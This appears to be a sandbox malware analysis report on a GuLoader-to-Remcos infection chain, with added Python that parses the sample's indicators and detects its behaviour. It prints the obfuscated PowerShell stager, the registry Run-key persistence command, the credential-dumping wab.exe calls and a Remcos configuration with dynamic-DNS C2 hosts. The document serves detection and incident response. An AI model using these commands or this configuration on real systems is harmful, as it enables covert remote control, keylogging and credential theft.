
Windows Analysis Report
z14Novospedidosdecompra_Profil_4903.exe

Overview

General Information

Sample name: z14Novospedidosdecompra_Profil_4903.exe
Analysis ID: 1428880
MD5: 0e1262a4ce5ac71ad5b8df93030d61b5
SHA1: efb918ee62ff5cca7bdc10d180c7f7837c8e2b6b
SHA256: a90c7b4223bca6a28296894c66845de8fb61e7028b9c45ab8e0ec7d27db0bf71
Tags: exe

Detection

GuLoader, Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Obfuscated command line found
Powershell drops PE file
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • z14Novospedidosdecompra_Profil_4903.exe (PID: 6864 cmdline: "C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe" MD5: 0E1262A4CE5AC71AD5B8DF93030D61B5)
    • powershell.exe (PID: 6452 cmdline: "powershell.exe" -windowstyle hidden "$Bromslvs=Get-Content 'C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Kursusplans.Fje';$Oxyphosphate=$Bromslvs.SubString(61080,3);.$Oxyphosphate($Bromslvs)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7192 cmdline: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • wab.exe (PID: 7812 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • cmd.exe (PID: 7864 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Slettelsers% -windowstyle minimized $ronnels=(Get-ItemProperty -Path 'HKCU:\Forsorgspdagog\').Skeletoverstter;%Slettelsers% ($ronnels)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • reg.exe (PID: 7912 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Slettelsers% -windowstyle minimized $ronnels=(Get-ItemProperty -Path 'HKCU:\Forsorgspdagog\').Skeletoverstter;%Slettelsers% ($ronnels)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • wab.exe (PID: 8104 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wjdznalymjqnxoyrjyc" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8112 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wjdznalymjqnxoyrjyc" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8120 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hdqrgswaarisauuvaipksos" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8148 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jfwcglgtwzafkaizktcddtnovi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
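The stager launched by the sample (powershell.exe, PID 6452 in the tree above) never puts its script on the command line: it reads an opaque file, slices three characters out of it at a fixed offset, and uses the call operator (`.`) to invoke those characters as a command with the whole file as the argument. The Python below is an added example, not code from the report; it parses that command line, emulates the slice on a constructed stand-in for Kursusplans.Fje, and flags the pattern. The stand-in blob and the assumed command name IEX are constructed; the report does not show the file's contents.

```python
import re

# Stager command line copied from the process tree above (powershell.exe, PID 6452).
STAGER_CMDLINE = r'''"powershell.exe" -windowstyle hidden "$Bromslvs=Get-Content 'C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Kursusplans.Fje';$Oxyphosphate=$Bromslvs.SubString(61080,3);.$Oxyphosphate($Bromslvs)"'''

# $blob = Get-Content '<path>'            -> the opaque file the stage lives in
PATH_RE = re.compile(r"Get-Content\s+(?:-Raw\s+)?'([^']+)'", re.I)
# $cmd = $blob.SubString(<offset>, <len>) -> a few characters of the blob become a command name
SLICE_RE = re.compile(r"\$(\w+)\s*=\s*\$(\w+)\.SubString\(\s*(\d+)\s*,\s*(\d+)\s*\)", re.I)
# .$cmd($blob) or &$cmd($blob)            -> the call operator invokes that name with the blob as argument
INVOKE_RE = re.compile(r"[.&]\s*\$(\w+)\s*\(\s*\$(\w+)\s*\)")


def parse_stager(cmdline):
    """Return the moving parts of a SubString-invoke stager, or None if the shape is absent."""
    m_path = PATH_RE.search(cmdline)
    m_slice = SLICE_RE.search(cmdline)
    m_inv = INVOKE_RE.search(cmdline)
    if not (m_path and m_slice and m_inv):
        return None
    cmd_var, blob_var, offset, length = m_slice.groups()
    # The sliced variable must be the one invoked, on the same blob; otherwise this
    # is an ordinary SubString call and not the loader pattern.
    if (m_inv.group(1), m_inv.group(2)) != (cmd_var, blob_var):
        return None
    return {"blob_path": m_path.group(1), "blob_var": blob_var, "cmd_var": cmd_var,
            "offset": int(offset), "length": int(length)}


def resolve_command(blob_text, offset, length):
    """Emulate $blob.SubString(offset, length): the command name PowerShell will call."""
    if offset + length > len(blob_text):
        # PowerShell would throw ArgumentOutOfRangeException here and the stage would not run.
        raise ValueError("slice lies outside the blob")
    return blob_text[offset:offset + length]


def build_demo_blob(offset, command="IEX"):
    """Constructed stand-in for Kursusplans.Fje: opaque filler with the command name at `offset`.
    The real file's bytes are not in the report; 'IEX' is an assumption."""
    filler = ("Aa" * (offset // 2 + 1))[:offset]
    return filler + command + "$second_stage=1;"  # trailing text stands in for the real script


def triage(cmdline, blob_text):
    """Tie the pieces together: which file, which slice, and which command it resolves to."""
    info = parse_stager(cmdline)
    if info is None:
        return None
    info["command"] = resolve_command(blob_text, info["offset"], info["length"])
    # With IEX (Invoke-Expression) the whole blob runs as PowerShell; the command line
    # only ever shows the file path and the slice, never the script.
    info["executes_blob_as_script"] = info["command"].lower() in ("iex", "invoke-expression")
    return info


if __name__ == "__main__":
    print(triage(STAGER_CMDLINE, build_demo_blob(61080)))
```

The offset is relative to the file content as PowerShell reads it with Get-Content (a single long line is assumed here), so to recover the real second stage from an infected host, take the file named in the command line and start at the byte offset given in the SubString call. The pattern check is deliberately structural: any command line that reads a file, slices a short string from it, and invokes that string on the same file is this loader shape regardless of the variable names, which change per sample.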
Malware family: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/stealers such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is XORed. In this sample the loader stage is a PowerShell stager launched by an NSIS-built executable (see the process tree above and the NSIS error string under Networking); the payload is fetched from ricohltd.top and the final stage runs inside wab.exe.
Attribution: none
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware family: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool used to remotely control computers. It is advertised as legitimate software for surveillance and penetration-testing purposes, but has been used in numerous hacking campaigns. Once installed, Remcos opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
Remcos configuration (Malware Configuration Extractor). The "Host:Port:Password" field holds three host:port:password entries that the extractor printed without a separator: learfo55ozj01.duckdns.org:29871:0, learfo55ozj01.duckdns.org:29872:1 and learfo55ozj02.duckdns.org:29872:1.
{"Host:Port:Password": "learfo55ozj01.duckdns.org:29871:0learfo55ozj01.duckdns.org:29872:1learfo55ozj02.duckdns.org:29872:1", "Assigned name": "Top", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "alpwovnb-G3F5OR", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "mqerms.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
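The configuration above lists three C2 entries, but the extractor printed them as one string. The following Python is an added example, not part of the Joe Sandbox report or of the Remcos software; it parses the configuration into indicators a responder can act on: it splits the run-together Host:Port:Password entries by pattern (assuming a one-character password field, as in this config), flags dynamic-DNS hosts against a partial provider list (an assumption), and derives the keylog file path that should exist on an infected host. The mapping of the Remcos path keyword AppData to %APPDATA% is an assumption; it matches the dropped file C:\Users\user\AppData\Roaming\mqerms.dat in this report.

```python
import json
import re

# Copied from the report's Malware Configuration Extractor output for this sample.
REMCOS_CONFIG_JSON = r'''{"Host:Port:Password": "learfo55ozj01.duckdns.org:29871:0learfo55ozj01.duckdns.org:29872:1learfo55ozj02.duckdns.org:29872:1", "Assigned name": "Top", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "alpwovnb-G3F5OR", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "mqerms.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}'''

# host:port:password, where the password is a single character here ("0"/"1"); the
# separator between entries was lost, so entries are recovered by shape, not delimiter.
C2_RE = re.compile(r"([A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+):(\d{1,5}):(.)")
# Dynamic-DNS providers commonly seen in RAT configs (partial list; an assumption).
DDNS_SUFFIXES = ("duckdns.org", "no-ip.com", "no-ip.org", "ddns.net", "hopto.org", "zapto.org", "sytes.net")
# Remcos path keywords and the location they resolve to (assumed mapping).
PATH_KEYWORDS = {"AppData": "%APPDATA%", "Temp": "%TEMP%", "Application path": "<directory of the running binary>"}


def parse_remcos_config(text):
    return json.loads(text)


def c2_endpoints(cfg):
    """Split the concatenated Host:Port:Password field into (host, port, password) tuples."""
    return [(host, int(port), pw) for host, port, pw in C2_RE.findall(cfg["Host:Port:Password"])]


def is_dynamic_dns(host):
    return host.lower().endswith(DDNS_SUFFIXES)


def expected_artifacts(cfg):
    """Host-side artifacts implied by the config: mutex, keylog file, self-install behaviour."""
    art = {"mutex": cfg.get("Mutex")}
    if cfg.get("Keylog flag") not in (None, "0", "Disable"):
        base = PATH_KEYWORDS.get(cfg.get("Keylog path"), cfg.get("Keylog path"))
        art["keylog_file"] = f"{base}\\{cfg['Keylog file']}"
    art["self_install"] = cfg.get("Install flag") == "Enable"
    art["run_keys_requested"] = [k for k in ("Setup HKCU\\Run", "Setup HKLM\\Run") if cfg.get(k) == "Enable"]
    return art


def indicators(cfg):
    eps = c2_endpoints(cfg)
    return {
        "c2_hosts": sorted({h for h, _, _ in eps}),
        "c2_ports": sorted({p for _, p, _ in eps}),
        "dynamic_dns": all(is_dynamic_dns(h) for h, _, _ in eps),
        **expected_artifacts(cfg),
    }


if __name__ == "__main__":
    print(json.dumps(indicators(parse_remcos_config(REMCOS_CONFIG_JSON)), indent=2))
```

Two things the parsed output makes explicit: the ports to watch are 29871 and 29872 on whatever the duckdns.org names resolve to (the Snort alerts below fired on 29871 towards 193.222.96.21), and "Install flag" is Disable, so Remcos does not copy itself as remcos.exe; the persistence on this host is the loader's "Startup key" Run value written via reg.exe, not a Remcos-created entry, and the keylog lands in %APPDATA%\mqerms.dat as the dropped-file Yara hit confirms.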
Yara matches (Source | Rule | Description | Author):
  • C:\Users\user\AppData\Roaming\mqerms.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
  • 00000007.00000003.2417745703.000000000971E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
  • 00000007.00000003.2443472067.000000000971E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
  • 00000007.00000002.2939981416.000000000971F000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
  • 00000007.00000003.2417578332.000000000971A000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
  • 00000001.00000002.2405665204.0000000009F4C000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
  (2 further entries not included in this excerpt)

              System Summary

Sigma matches:
  • Process started (rule: Wab/Wabmig Unusual Parent Or Child Processes; author: Nasreddine Bencherchali (Nextron Systems)). Image: C:\Windows\SysWOW64\cmd.exe (PID 7864); CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Slettelsers% -windowstyle minimized $ronnels=(Get-ItemProperty -Path 'HKCU:\Forsorgspdagog\').Skeletoverstter;%Slettelsers% ($ronnels)"; ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe (PID 7812); ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe"
  • Registry key set (rule: CurrentVersion Autorun Keys Modification; authors: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)). EventID: 13 (SetValue); Image: C:\Windows\SysWOW64\reg.exe (PID 7912); TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key; Details: %Slettelsers% -windowstyle minimized $ronnels=(Get-ItemProperty -Path 'HKCU:\Forsorgspdagog\').Skeletoverstter;%Slettelsers% ($ronnels)
  • Process started (rule: Direct Autorun Keys Modification; authors: Victor Sergeev, Daniil Yugoslavskiy, oscd.community). Image: C:\Windows\SysWOW64\reg.exe (PID 7912); CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Slettelsers% -windowstyle minimized $ronnels=(Get-ItemProperty -Path 'HKCU:\Forsorgspdagog\').Skeletoverstter;%Slettelsers% ($ronnels)"; CommandLine|base64offset|contains: DA; ParentImage: C:\Windows\SysWOW64\cmd.exe (PID 7864); ParentCommandLine: the cmd.exe /c REG ADD command above
  • File created (rule: Potential Binary Or Script Dropper Via PowerShell; authors: frack113, Nasreddine Bencherchali (Nextron Systems)). EventID: 11; Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 6452); TargetFilename: C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Extracollegiate\Chiffonnierer\Rudekonvolutten\z14Novospedidosdecompra_Profil_4903.exe
  • Process started (rule: Potential Dosfuscation Activity; authors: frack113, Nasreddine Bencherchali (Nextron Systems)). Image: C:\Windows\SysWOW64\cmd.exe (PID 7192); CommandLine: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"; ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 6452); ParentCommandLine: "powershell.exe" -windowstyle hidden "$Bromslvs=Get-Content 'C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Kursusplans.Fje';$Oxyphosphate=$Bromslvs.SubString(61080,3);.$Oxyphosphate($Bromslvs)"
  • Process started (rule: Potential Persistence Attempt Via Run Keys Using Reg.EXE; author: Florian Roth (Nextron Systems)). Image: C:\Windows\SysWOW64\cmd.exe (PID 7864); CommandLine: the cmd.exe /c REG ADD command above; ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe (PID 7812); ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe"
  • Process started (authors: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)). Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 6452); CommandLine: the stager command line shown in the process tree above for PID 6452; CommandLine|base64offset|contains: v,)^; ParentImage: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe (PID 6864); ParentCommandLine: "C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe"
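The Sigma hits above describe one persistence chain: the injected wab.exe spawns cmd.exe, which spawns reg.exe to write a REG_EXPAND_SZ Run value whose launcher is an environment variable (%Slettelsers%) and whose script body is read from a second registry value (HKCU:\Forsorgspdagog\Skeletoverstter). The Python below is an added example, not part of the report or of the Sigma rules it cites. It runs four checks over constructed Sysmon-style events whose field values are copied from those Sigma lines: unusual wab.exe lineage, the NirSoft /stext switch in a wab.exe command line, REG ADD into a Run key with both evasions called out, and the EventID 13 registry write. The event shape is a simplified assumption, and the rule logic is a generalization written for this example rather than the Sigma rules' exact conditions.

```python
import re
from pathlib import PureWindowsPath

# Command line copied from the report (reg.exe PID 7912; cmd.exe PID 7864 wraps the same command).
REG_ADD_CMD = r'''REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Slettelsers% -windowstyle minimized $ronnels=(Get-ItemProperty -Path 'HKCU:\Forsorgspdagog\').Skeletoverstter;%Slettelsers% ($ronnels)"'''
WAB = r"C:\Program Files (x86)\Windows Mail\wab.exe"

# Constructed Sysmon-style events; every field value is taken from the report's Sigma lines.
EVENTS = [
    {"EventID": 1, "ProcessId": 7812, "Image": WAB,
     "ParentImage": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Program Files (x86)\windows mail\wab.exe"'},
    {"EventID": 1, "ProcessId": 7864, "Image": r"C:\Windows\SysWOW64\cmd.exe", "ParentImage": WAB,
     "CommandLine": r'"C:\Windows\System32\cmd.exe" /c ' + REG_ADD_CMD},
    {"EventID": 1, "ProcessId": 7912, "Image": r"C:\Windows\SysWOW64\reg.exe",
     "ParentImage": r"C:\Windows\SysWOW64\cmd.exe", "CommandLine": REG_ADD_CMD},
    {"EventID": 1, "ProcessId": 8104, "Image": WAB, "ParentImage": WAB,
     "CommandLine": r'"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wjdznalymjqnxoyrjyc"'},
    {"EventID": 13, "ProcessId": 7912, "Image": r"C:\Windows\SysWOW64\reg.exe",
     "TargetObject": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key"},
]

RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?\b", re.I)
REG_ADD_RE = re.compile(r"\bREG\s+ADD\s+(\S+)(.*)", re.I)
ENV_LAUNCHER_RE = re.compile(r"^\s*%(\w+)%")  # value data starts with an environment variable
REG_STORE_RE = re.compile(r"Get-ItemProperty\s+-Path\s+'([^']+)'\s*\)\.(\w+)", re.I)  # script pulled from the registry
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "reg.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
WAB_IMAGES = {"wab.exe", "wabmig.exe"}


def _name(path):
    return PureWindowsPath(path).name.lower()


def parse_reg_add(cmdline):
    """Pull key, value name, type and data out of a REG ADD command (also when wrapped in cmd /c)."""
    m = REG_ADD_RE.search(cmdline)
    if not m:
        return None
    key, opts = m.groups()

    def opt(flag):  # a quoted value may contain spaces; its quote closes only before the next switch or at the end
        mm = re.search(r"(?i)" + re.escape(flag) + r'\s+(?:"(.*?)"(?=\s+/|\s*$)|(\S+))', opts)
        return None if not mm else (mm.group(1) if mm.group(1) is not None else mm.group(2))

    return {"key": key, "value": opt("/v"), "type": opt("/t"), "data": opt("/d") or ""}


def wab_unusual_lineage(ev):
    """The Windows Address Book has no business spawning, or being spawned by, shells and script hosts."""
    img, parent = _name(ev.get("Image", "")), _name(ev.get("ParentImage", ""))
    if parent in WAB_IMAGES and img in SHELLS:
        return {"rule": "wab_unusual_child", "pid": ev["ProcessId"], "child": img}
    if img in WAB_IMAGES and parent in SHELLS:
        return {"rule": "wab_unusual_parent", "pid": ev["ProcessId"], "parent": parent}
    return None


def wab_stext_dump(ev):
    """/stext is the NirSoft 'save as text' switch; an injected wab.exe using it is dumping credentials to a file."""
    if _name(ev.get("Image", "")) in WAB_IMAGES and re.search(r"/stext\b", ev.get("CommandLine", ""), re.I):
        return {"rule": "wab_stext_dump", "pid": ev["ProcessId"]}
    return None


def run_key_persistence(ev):
    """REG ADD into a Run key, with the two tricks this sample uses called out explicitly."""
    reg = parse_reg_add(ev.get("CommandLine", ""))
    if not reg or not RUN_KEY_RE.search(reg["key"]):
        return None
    reasons, launcher, store = [], ENV_LAUNCHER_RE.match(reg["data"]), REG_STORE_RE.search(reg["data"])
    if launcher and (reg["type"] or "").upper() == "REG_EXPAND_SZ":
        reasons.append(f"launcher hidden behind %{launcher.group(1)}%, expanded only at logon")
    if store:
        reasons.append(f"script body stored in {store.group(1)} value {store.group(2)}")
    return {"rule": "run_key_via_reg", "pid": ev["ProcessId"], "value": reg["value"], "type": reg["type"],
            "launcher_var": launcher.group(1) if launcher else None,
            "store": store.groups() if store else None, "reasons": reasons}


def run_key_registry_set(ev):
    """Sysmon EventID 13: the registry write itself, independent of which tool made it."""
    if ev.get("EventID") == 13 and RUN_KEY_RE.search(ev.get("TargetObject", "")):
        return {"rule": "run_key_set", "pid": ev["ProcessId"], "target": ev["TargetObject"]}
    return None


RULES = (wab_unusual_lineage, wab_stext_dump, run_key_persistence, run_key_registry_set)


def detect(events):
    return [hit for ev in events for rule in RULES if (hit := rule(ev))]


if __name__ == "__main__":
    for hit in detect(EVENTS):
        print(hit)
```

For remediation the run_key_via_reg finding is the one to read carefully: deleting the "Startup key" value is not enough, because the script lives in HKCU:\Forsorgspdagog\Skeletoverstter and the launcher is whatever %Slettelsers% expands to on that host, and this report section shows neither value. Both have to be collected before cleanup or the persistence cannot be fully characterised.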
Snort IDS alerts (chronological):
  • 04/19/24-19:12:11.262632 | SID 2032776 | TCP, source port 49738 -> destination port 29871 | Classtype: A Network Trojan was detected (Remcos check-in; see Networking below)
  • 04/19/24-19:12:11.492624 | SID 2032777 | TCP, source port 29871 -> destination port 49738 | Classtype: A Network Trojan was detected (server response)


              AV Detection

Source: http://pesterbdd.com/images/Pester.png | URL Reputation: Label: malware
Source: http://geoplugin.net/json.gp | URL Reputation: Label: phishing
Note: neither URL is the C2. The Pester.png URL is a string from the Pester PowerShell module found in powershell.exe memory (see the Pester/GitHub strings under Networking), and geoplugin.net is the public geolocation API that the Remcos payload queries from wab.exe (GET /json.gp). The C2 endpoints are the duckdns.org hosts in the extracted configuration.
Source: 00000007.00000003.2417745703.000000000971E000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": "learfo55ozj01.duckdns.org:29871:0learfo55ozj01.duckdns.org:29872:1learfo55ozj02.duckdns.org:29872:1", "Assigned name": "Top", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "alpwovnb-G3F5OR", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "mqerms.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Extracollegiate\Chiffonnierer\Rudekonvolutten\z14Novospedidosdecompra_Profil_4903.exe | ReversingLabs: Detection: 57%
Source: z14Novospedidosdecompra_Profil_4903.exe | ReversingLabs: Detection: 57%
Source: Yara match | File source: 00000007.00000003.2417745703.000000000971E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.2443472067.000000000971E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2939981416.000000000971F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.2417578332.000000000971A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: wab.exe PID: 7812, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\mqerms.dat, type: DROPPED
Source: C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Extracollegiate\Chiffonnierer\Rudekonvolutten\z14Novospedidosdecompra_Profil_4903.exe | Joe Sandbox ML: detected
Source: z14Novospedidosdecompra_Profil_4903.exe | Joe Sandbox ML: detected
Source: z14Novospedidosdecompra_Profil_4903.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.60.38:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: z14Novospedidosdecompra_Profil_4903.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: stem.Core.pdb_K | source: powershell.exe, 00000001.00000002.2404825141.0000000008A40000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 | source: powershell.exe, 00000001.00000002.2393081207.0000000003286000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Targetore.pdb | source: powershell.exe, 00000001.00000002.2404825141.0000000008A5F000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe | Code function: 0_2_00405841 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe | Code function: 0_2_004027FB FindFirstFileW
Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe | Code function: 0_2_00406393 FindFirstFileW,FindClose
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_0040AE51 FindFirstFileW,FindNextFileW
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 13_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\
